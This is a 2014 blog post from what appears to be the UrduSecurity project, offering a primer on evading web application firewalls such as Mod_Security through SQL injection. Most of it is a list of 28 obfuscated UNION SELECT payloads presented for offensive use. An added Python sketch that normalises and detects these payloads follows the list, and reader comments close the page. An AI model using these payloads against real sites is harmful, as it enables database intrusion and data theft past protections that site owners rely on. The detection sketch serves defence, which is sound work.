Saturday 22 March 2014



Hello readers, what's up, gentlemen? Everything fine?

Ah, I hope it's fine :)

As you guys know, in every primer I start from the very basics and then move toward advanced techniques, and it depends on the structure of the target method whether I explain it or do it practically. So here now is SQL Injection Web Application Firewall Bypassing, and I hope you guys will like it very much :)


So let's start without wasting time, right? OK.

Hands on: Let's Begin

KEEP IN MIND THAT HOW WE HAVE TO USE THESE WAF BYPASSES DEPENDS ON THE SCENARIO

Lecture #1

Introduction to WAFs and Why We Have to Bypass Them



Lecture #2

Bypassing Mod_Security and Some Common Union Select Queries

Some common UNION SELECT queries that can usually be used are given below.



  1. %55nion(%53elect 1,2,3)-- -
  2. +union+distinct+select+
  3. +union+distinctROW+select+
  4. /**//*!12345UNION SELECT*//**/
  5. /**//*!50000UNION SELECT*//**/
  6. /**/UNION/**//*!50000SELECT*//**/
  7. /*!50000UniON SeLeCt*/
  8. union /*!50000%53elect*/
  9. +#uNiOn+#sEleCt
  10. +#1q%0AuNiOn all#qa%0A#%0AsEleCt
  11. /*!%55NiOn*/ /*!%53eLEct*/
  12. /*!u%6eion*/ /*!se%6cect*/
  13. +un/**/ion+se/**/lect
  14. uni%0bon+se%0blect
  15. %2f**%2funion%2f**%2fselect
  16. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A
  17. REVERSE(noinu)+REVERSE(tceles)
  18. /*--*/union/*--*/select/*--*/
  19. union (/*!/**/ SeleCT */ 1,2,3)
  20. /*!union*/+/*!select*/
  21. union+/*!select*/
  22. /**/union/**/select/**/
  23. /**/uNIon/**/sEleCt/**/
  24. /**//*!union*//**//*!select*//**/
  25. /*!uNIOn*/ /*!SelECt*/
  26. +union+distinct+select+
  27. +union+distinctROW+select+
  28. uNiOn aLl sElEcT 
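
Seen from the defending side, most entries in the list above collapse to the same UNION SELECT once percent-encoding, comments and letter case are normalized. The Python sketch below is an added example, not part of the original post: it canonicalizes a parameter value and compares a plain keyword rule with a match on the canonical form. The function names, both regular expressions and the benign sample value are assumptions made for illustration.

```python
import re
from urllib.parse import unquote, unquote_plus

NAIVE = re.compile(r"union\s+select", re.I)   # plain keyword rule (assumed, illustrative)
CANON = re.compile(r"\bunion\b(\s+(all|distinct|distinctrow))?\s*\(?\s*select\b")
MARK = "\x00"                                 # stands in for a removed comment

def strip_comments(s):
    """Scan left to right so '--' or '#' inside /* ... */ is not misread."""
    out, i = [], 0
    while i < len(s):
        if s.startswith("/*!", i):            # MySQL executable comment: body still runs
            i += 3
            while i < len(s) and s[i].isdigit():
                i += 1                        # skip the optional version number
        elif s.startswith("*/", i):           # closer of an executable comment
            i += 2
        elif s.startswith("/*", i):           # ordinary block comment
            end = s.find("*/", i + 2)
            i = len(s) if end < 0 else end + 2
        elif s[i] == "#" or s.startswith("-- ", i):   # line comment, up to end of line
            end = s.find("\n", i)
            i = len(s) if end < 0 else end + 1
        else:
            out.append(s[i])
            i += 1
            continue
        out.append(MARK)
    return "".join(out)

def canonical_forms(raw):
    s, prev = raw.replace("+", " "), None
    while prev != s:                          # repeat to undo nested percent-encoding
        prev, s = s, unquote(s)
    s = strip_comments(s).lower()
    # Two readings: comment acts as whitespace, or an upstream filter deleted it.
    return [re.sub(r"\s+", " ", s.replace(MARK, r)) for r in (" ", "")]

def naive_hit(raw):
    return bool(NAIVE.search(unquote_plus(raw)))

def canonical_hit(raw):
    return any(CANON.search(f) for f in canonical_forms(raw))

# Entries 1, 6, 10, 13, 16, 19 and 28 of the list above; BENIGN is a constructed value.
SAMPLES = ["%55nion(%53elect 1,2,3)-- -", "/**/UNION/**//*!50000SELECT*//**/",
           "+#1q%0AuNiOn all#qa%0A#%0AsEleCt", "+un/**/ion+se/**/lect",
           "union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A",
           "union (/*!/**/ SeleCT */ 1,2,3)", "uNiOn aLl sElEcT "]
BENIGN = "q=credit+union+branch&sort=select_all"
```

This covers the encoding, comment and case variations only; function-based forms such as entry 17 need an actual SQL parser rather than pattern matching.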



Demonstration:




Lecture #3


WAF Bypass Using SQLMAP






To be continued!







SQLi WAF ByPASSing Primer - UrduSecurity Project

  • Uploaded by: Adeel Chaudhary

    8 comments:

    1. I never thought sqlmap could be helpful, but you showed me a way. Thanks, admin; waiting for more things to learn from you. Nice

      Replies
      1. Thanks for your feedback, subscribe to the blog for more upcoming videos :)

    2. keep it up and keep making good videos :)

      Replies
      1. Thanks for your feedback, subscribe to the blog for more upcoming videos :)

    3. Please post WAF ByPass Using SQLMAP in HD, please :)

    4. Thanks, dear. Nice tutorial. This is my email, please send me upcoming videos: Irfanhussain0334@gmail.com

    5. Awesome tutorial :) Bro!
      Kindly complete it with advanced injection :) and POST method!
      I'm waiting for your tutorial :) With love <3


     
    Copyright © HACK | Designed by Muhammad Adeel | Founder UrduSecurity